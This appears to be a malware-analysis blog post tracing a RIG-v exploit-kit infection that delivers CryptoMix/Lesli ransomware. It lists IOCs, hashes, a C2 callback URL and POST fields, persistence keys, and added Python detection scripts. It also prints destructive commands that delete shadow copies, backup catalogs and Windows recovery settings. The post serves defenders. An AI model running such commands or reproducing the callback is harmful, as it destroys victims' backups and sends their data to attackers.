IOCs:
- 68.178.254.116 – westwoodenabler.com – Compromised website
- 92.53.120.233 – top.tbn1.us – RIG-v EK
- 91.121.244.84 – CryptoMix callback traffic
Traffic:
Hashes:
SHA256: 76cd48af0b8a0dbaa9260996cd4347a811bc0a09efce18c9d25f7cc59828d335
File name: RIG-v Flash Exploit.swf
SHA256: 3ff4c80212d97aa64154dc3bd6a361766286c5073d15ec65cb32fe2755f8a703
File name: QTTYUADAF
SHA256: 038bfb53f45a596762be789c66663966ef9bf04c1c80aae339f40e9a5fe3088c
File name: “radC79C9.tmp.exe” and “Spy Security SoftWare_91bf6e5_aed68d54.exe”
Hybrid-Analysis Report
Infection Chain:
The infection chain started off with me browsing to the compromised website. Injected in the source code of the page was the EITest script:
The URL contained within the script shown above returns the RIG-v “pre-landing” page. This pre-landing page contains further script that checks whether the browser is Internet Explorer. If the host is using IE, it is redirected to the landing page via a POST request.
I won’t be posting a full image of the pre-landing page in this post since I already did that in a previous one. Also, a brief explanation of the checks being performed by the pre-landing page can be found here.
Next we see the usual GET request for a Flash exploit, a JS downloader being dropped in %Temp%, and the GET request for the RIG-v EK payload.
Below is an image of the JS downloader and CryptoMix payload in %Temp%. The executable is also copied to the ProgramData folder under the name “Spy Security Software_xxxxxxx_xxxxxxxx” (xxxxxxx_xxxxxxxx = host ID number):
Values are created in Run and RunOnce for persistence:
We then see the host make the following GET request, which carries a single URI query parameter (info=):
91[.]121[.]244[.]84/ms_inforimation_os/os_check/101022/statistic_validos.php?info=nfuDISTF7Y6STYhjkfjuisskFDSA
They spelled information as “inforimation.” The response from the server is 401 Unauthorized and the line-based text data shows “os_valid: TRUE”:
The host then POSTs back its “id_number” (OSID_xxxxxxxxxxxxxxx), “key_os” (RSA1 key), and “status” as HTML form items (key/value pairs). The second POST is identical to the first except that the status now contains the value “DoneWorkEnd” (whereas before it was empty).
POST request URI: /ms_inforimation_os/os_check/101022/checks_os_valid.php
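The check-in/key-upload/completion sequence described above is easy to pick out of proxy logs once you know the path and field names. The following is an added example, not code from the original post: a small Python scanner that runs over constructed proxy-style records (the IP, URI paths, info= parameter and form field names are taken from the traffic above; the timestamps, client addresses and form values are made-up placeholders) and labels each hit with the stage of the callback it represents.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed proxy-style records. The IP, paths, query parameter and form
# field names come from the traffic described in the post; the timestamps,
# client address and form values are made-up placeholders.
SAMPLE_RECORDS = [
    {"ts": "2017-03-30T10:01:02", "src": "10.0.0.15", "method": "GET",
     "url": "http://91.121.244.84/ms_inforimation_os/os_check/101022/"
            "statistic_validos.php?info=nfuDISTF7Y6STYhjkfjuisskFDSA",
     "status": 401, "body": ""},
    {"ts": "2017-03-30T10:01:03", "src": "10.0.0.15", "method": "POST",
     "url": "http://91.121.244.84/ms_inforimation_os/os_check/101022/checks_os_valid.php",
     "status": 200,
     "body": "id_number=OSID_PLACEHOLDER000001&key_os=PLACEHOLDER_RSA1_BLOB&status="},
    {"ts": "2017-03-30T10:09:41", "src": "10.0.0.15", "method": "POST",
     "url": "http://91.121.244.84/ms_inforimation_os/os_check/101022/checks_os_valid.php",
     "status": 200,
     "body": "id_number=OSID_PLACEHOLDER000001&key_os=PLACEHOLDER_RSA1_BLOB&status=DoneWorkEnd"},
    {"ts": "2017-03-30T10:10:00", "src": "10.0.0.22", "method": "GET",
     "url": "http://www.example.com/index.html", "status": 200, "body": ""},
]

# Indicators from the post: the callback IP and the (misspelled) URI path.
C2_HOSTS = {"91.121.244.84"}
C2_PATH_RE = re.compile(
    r"/ms_inforimation_os/os_check/\d+/(statistic_validos|checks_os_valid)\.php$")


def classify(record):
    """Return a finding dict for a record that matches the callback pattern, else None."""
    parts = urlsplit(record["url"])
    if parts.hostname not in C2_HOSTS and not C2_PATH_RE.search(parts.path):
        return None
    finding = {"ts": record["ts"], "src": record["src"], "stage": "other", "details": {}}
    if record["method"] == "GET" and parts.path.endswith("statistic_validos.php"):
        # First beacon: the info= value is the only data sent; keep it for correlation.
        finding["stage"] = "check-in"
        finding["details"]["info"] = parse_qs(parts.query).get("info", [""])[0]
    elif record["method"] == "POST" and parts.path.endswith("checks_os_valid.php"):
        # keep_blank_values so an empty "status=" still appears as a key.
        form = parse_qs(record["body"], keep_blank_values=True)
        status = form.get("status", [""])[0]
        finding["details"] = {
            "id_number": form.get("id_number", [""])[0],
            "key_os_present": bool(form.get("key_os", [""])[0]),
            "status": status,
        }
        # Empty status = key upload before encryption; DoneWorkEnd = encryption finished.
        if status == "DoneWorkEnd":
            finding["stage"] = "encryption-complete"
        elif status == "":
            finding["stage"] = "key-upload"
        else:
            finding["stage"] = "status-update"
    return finding


def scan(records):
    """Run classify() over every record and keep the matches, in log order."""
    return [f for f in map(classify, records) if f is not None]


if __name__ == "__main__":
    for hit in scan(SAMPLE_RECORDS):
        print(hit["ts"], hit["src"], hit["stage"], hit["details"])
```

The path regex is kept alongside the IP so the rule survives a change of hosting; the "DoneWorkEnd" POST is the useful alert for responders, since it marks the point after which the files on that host are already encrypted.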
Making a direct request to the web server returns the following page:
The page is a direct copy of https://www.windows-commandline[.]com/find-windows-os-version-from-command/, which is a legitimate domain registered by Google (resolves to 104.25.85.12). All links on hxxp://91.121.244.84 redirect to windows-commandline[.]com.
Notable processes for radC79C9.tmp.exe include:
- cmd.exe /C vssadmin.exe Delete Shadows /All /Quiet
- vssadmin.exe Delete Shadows /All /Quiet
- cmd.exe /C wmic shadowcopy delete
- WMIC.exe wmic shadowcopy delete
- cmd.exe /C net stop vss
- net.exe net stop vss
- net1.exe %WINDIR%system32net1 stop vss
- cmd.exe /C bcdedit /set {default} recoveryenabled No
- bcdedit.exe bcdedit /set {default} recoveryenabled No
- cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
- bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
- cmd.exe /C wbadmin delete catalog -quiet
- wbadmin.exe wbadmin delete catalog -quiet
After the user’s files have been encrypted, the filenames are appended with .email[supl@post.com]id[personal identification ID] and the file extension is changed to .lesli.
Lastly we see the ransom notes (INSTRUCTION RESTORE FILE.TXT) created in various folders as well as one dropped on the Desktop. The bottom of the ransom note says “LESLI SPYING ON YOU”:
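The process list and the renaming scheme above are the two host-side artifacts a responder can match on. The following is an added example, not code from the original post: Python detection logic that runs over constructed process-creation events (the 13 command lines from the list, plus one benign "net stop" to show it is not flagged) and over a constructed directory listing. The encrypted-file name layout "<original name>.email[<address>]id[<victim id>].lesli" is an assumption based on the description above, and the victim IDs are placeholders.

```python
import re

# One regex per recovery-inhibition command from the process list in the post.
# Case-insensitive; tolerant of the "cmd.exe /C ..." wrapper and ".exe" suffixes.
RECOVERY_INHIBITION_RULES = [
    ("shadow copies deleted via vssadmin", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("shadow copies deleted via wmic", re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("VSS service stopped", re.compile(r"net1?(\.exe)?\s+stop\s+vss\b", re.I)),
    ("Windows recovery disabled",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no\b", re.I)),
    ("boot-failure recovery suppressed",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures", re.I)),
    ("backup catalog deleted", re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
]

# Assumed layout of an encrypted file name: <original>.email[<address>]id[<victim id>].lesli
ENCRYPTED_NAME_RE = re.compile(
    r"^(?P<original>.+)\.email\[(?P<email>[^\]]+)\]id\[(?P<victim_id>[^\]]+)\]\.lesli$", re.I)
RANSOM_NOTE_NAME = "INSTRUCTION RESTORE FILE.TXT"

# Constructed (image, command line) events: the lines from the post plus one benign stop.
SAMPLE_EVENTS = [
    ("cmd.exe", "cmd.exe /C vssadmin.exe Delete Shadows /All /Quiet"),
    ("vssadmin.exe", "vssadmin.exe Delete Shadows /All /Quiet"),
    ("cmd.exe", "cmd.exe /C wmic shadowcopy delete"),
    ("WMIC.exe", "WMIC.exe wmic shadowcopy delete"),
    ("cmd.exe", "cmd.exe /C net stop vss"),
    ("net.exe", "net.exe net stop vss"),
    ("net1.exe", "net1.exe %WINDIR%system32net1 stop vss"),
    ("cmd.exe", "cmd.exe /C bcdedit /set {default} recoveryenabled No"),
    ("bcdedit.exe", "bcdedit.exe bcdedit /set {default} recoveryenabled No"),
    ("cmd.exe", "cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    ("bcdedit.exe", "bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    ("cmd.exe", "cmd.exe /C wbadmin delete catalog -quiet"),
    ("wbadmin.exe", "wbadmin.exe wbadmin delete catalog -quiet"),
    ("cmd.exe", "cmd.exe /C net stop spooler"),  # benign: not VSS related, must not fire
]

# Constructed directory listing with placeholder victim IDs.
SAMPLE_LISTING = [
    "Q1_budget.xlsx.email[supl@post.com]id[PLACEHOLDERID01].lesli",
    "holiday.jpg.email[supl@post.com]id[PLACEHOLDERID01].lesli",
    "INSTRUCTION RESTORE FILE.TXT",
    "desktop.ini",
]


def match_command(cmdline):
    """Label of the first recovery-inhibition rule matching the command line, or None."""
    for label, rule in RECOVERY_INHIBITION_RULES:
        if rule.search(cmdline):
            return label
    return None


def scan_process_events(events):
    """Return [(image, cmdline, label)] for every event that matches a rule."""
    hits = []
    for image, cmdline in events:
        label = match_command(cmdline)
        if label:
            hits.append((image, cmdline, label))
    return hits


def parse_encrypted_name(name):
    """Split an encrypted file name into original name, contact address and victim id."""
    m = ENCRYPTED_NAME_RE.match(name)
    return m.groupdict() if m else None


def scan_listing(names):
    """Summarise encrypted files and note whether the ransom note is present."""
    encrypted = [r for r in map(parse_encrypted_name, names) if r]
    return {
        "encrypted_count": len(encrypted),
        "victim_ids": sorted({r["victim_id"] for r in encrypted}),
        "contact_emails": sorted({r["email"].lower() for r in encrypted}),
        "ransom_note_present": any(n.upper() == RANSOM_NOTE_NAME for n in names),
    }


def assess(events, names):
    """Combine both artifact types into one verdict for the host."""
    techniques = sorted({label for _, _, label in scan_process_events(events)})
    listing = scan_listing(names)
    if techniques and listing["encrypted_count"]:
        verdict = "ransomware: recovery inhibited and encrypted files present"
    elif techniques:
        verdict = "suspicious: recovery-inhibition commands without encrypted files"
    elif listing["encrypted_count"]:
        verdict = "suspicious: encrypted files without recovery-inhibition commands"
    else:
        verdict = "clean"
    return {"verdict": verdict, "techniques": techniques, **listing}


if __name__ == "__main__":
    print(assess(SAMPLE_EVENTS, SAMPLE_LISTING))
```

The command-line rules are the part worth wiring into a real process-creation source (Sysmon event 1 or 4688 with command-line auditing): the "vssadmin Delete Shadows" and "wbadmin delete catalog" rules in particular have almost no legitimate interactive use on workstations, which is why they are the highest-value alerts of the six.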
My recommendations would be to block the RIG-v EK IP at your firewall(s) and to disable vssadmin.exe. To read more about why and how you should disable vssadmin.exe click HERE.